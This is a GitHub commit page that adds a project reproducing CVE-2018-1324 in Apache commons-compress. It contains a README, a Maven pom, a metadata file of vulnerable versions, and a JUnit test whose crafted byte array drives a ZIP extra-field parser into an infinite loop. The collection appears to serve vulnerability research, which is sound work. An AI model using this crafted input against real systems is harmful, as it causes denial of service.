-
Notifications
You must be signed in to change notification settings - Fork 2
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #8 from jensdietrich/CVE-2018-1324
Add CVE-2018-1324
- Loading branch information
Showing
4 changed files
with
124 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,17 @@ | ||
| # [CVE-2018-1324](https://nvd.nist.gov/vuln/detail/CVE-2018-1324) from [vul4j](https://github.com/tuhh-softsec/vul4j) | ||
|
|
||
| Project reproduces CVE-2018-1324 using CVE-specific test from a | ||
| [vul4j commit](https://github.com/tuhh-softsec/vul4j/commit/45ddad15edd0f56a38d1d10e1ac6e1c2de9de881). | ||
|
|
||
| The test has been rewritten to succeed if the vul4j test times out. The original test seems to be sensitive to timing, | ||
| i.e. the fixed versions may not complete within the timeout given a slow environment, thus timeout was increased to 12 | ||
| seconds. | ||
|
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,51 @@ | ||
| <?xml version="1.0" encoding="UTF-8"?> | ||
| <project xmlns="http://maven.apache.org/POM/4.0.0" | ||
| xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" | ||
| xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> | ||
|
|
||
| <groupId>io.github.jensdietrich.xshady</groupId> | ||
| <artifactId>CVE-2018-1324</artifactId> | ||
| <version>1.0.0</version> | ||
| <packaging>jar</packaging> | ||
| <modelVersion>4.0.0</modelVersion> | ||
| <description>CVE-2018-1324 POC</description> | ||
| <name>CVE-2018-1324</name> | ||
|
|
||
| <properties> | ||
| <maven.compiler.target>11</maven.compiler.target> | ||
| <maven.compiler.source>11</maven.compiler.source> | ||
| </properties> | ||
|
|
||
| <licenses> | ||
| <license> | ||
| <name>The Apache License, Version 2.0</name> | ||
| <url>http://www.apache.org/licenses/LICENSE-2.0.txt</url> | ||
| </license> | ||
| </licenses> | ||
|
|
||
| <dependencies> | ||
| <dependency> | ||
| <groupId>org.apache.commons</groupId> | ||
| <artifactId>commons-compress</artifactId> | ||
| <version>1.16.1</version> | ||
| </dependency> | ||
| <dependency> | ||
| <groupId>org.junit.jupiter</groupId> | ||
| <artifactId>junit-jupiter-api</artifactId> | ||
| <version>5.9.2</version> | ||
| <scope>test</scope> | ||
| </dependency> | ||
|
|
||
| </dependencies> | ||
|
|
||
| <build> | ||
| <plugins> | ||
| <plugin> | ||
| <groupId>org.apache.maven.plugins</groupId> | ||
| <artifactId>maven-surefire-plugin</artifactId> | ||
| <version>3.0.0</version> | ||
| </plugin> | ||
| </plugins> | ||
| </build> | ||
|
|
||
| </project> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,13 @@ | ||
| { | ||
| "id": "CVE-2018-1324", | ||
| "artifact": "org.apache.commons:commons-compress", | ||
| "vulnableVersions": [ | ||
| "1.11", | ||
| "1.12", | ||
| "1.13", | ||
| "1.14", | ||
| "1.15" | ||
| ], | ||
| "fixVersion": "1.16.1", | ||
| "testSignal": "success" | ||
| } |
43 changes: 43 additions & 0 deletions
43
CVE-2018-1324/src/test/java/org/apache/commons/compress/Test_CVE_2018_1324.java
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,43 @@ | ||
| package org.apache.commons.compress; | ||
|
|
||
| import org.apache.commons.compress.archivers.zip.ZipFile; | ||
| import org.apache.commons.compress.archivers.zip.ZipLong; | ||
| import org.apache.commons.compress.archivers.zip.ZipShort; | ||
| import org.apache.commons.compress.archivers.zip.X0017_StrongEncryptionHeader; | ||
| import org.opentest4j.AssertionFailedError; | ||
| import org.xml.sax.helpers.DefaultHandler; | ||
|
|
||
|
|
||
| import java.io.IOException; | ||
| import java.time.Duration; | ||
|
|
||
| import org.junit.jupiter.api.Test; | ||
|
|
||
| import static org.junit.jupiter.api.Assertions.assertEquals; | ||
| import static org.junit.jupiter.api.Assertions.assertThrows; | ||
| import static org.junit.jupiter.api.Assertions.assertTimeoutPreemptively; | ||
|
|
||
|
|
||
| public class Test_CVE_2018_1324 { | ||
|
|
||
| @Test | ||
| public void vulnerabilityProof() { | ||
| assertThrows(AssertionFailedError.class, this::testCVE_2018_1324); | ||
| } | ||
|
|
||
| // Running test should not be in an infinite loop | ||
| public void testCVE_2018_1324() throws IOException { | ||
| // the data is crafted based on the file difflist_fsbwserver.f-secure.com_80_583109529_2.zip | ||
| byte[] data = {23, 0, 0, 0, 1, 40, 0, 0, 0, 62, 55, 15, 87, 121, -27, -23, -5, 9, -118, -2, -45, -115, -63, -110, -24}; | ||
| int offset = 4; | ||
| int length = 0; | ||
|
|
||
| ZipShort.putShort(1, data, offset + 14); // reduce the number of second loops from 65152 -> 1 to save testing time | ||
|
|
||
| assertEquals(3924130135L, ZipLong.getValue(data, offset + 8)); | ||
| assertEquals(1, ZipShort.getValue(data, offset + 14)); | ||
|
|
||
| X0017_StrongEncryptionHeader x0017 = new X0017_StrongEncryptionHeader(); | ||
| assertTimeoutPreemptively(Duration.ofSeconds(12), () -> x0017.parseCentralDirectoryFormat(data, offset, length)); | ||
| } | ||
| } |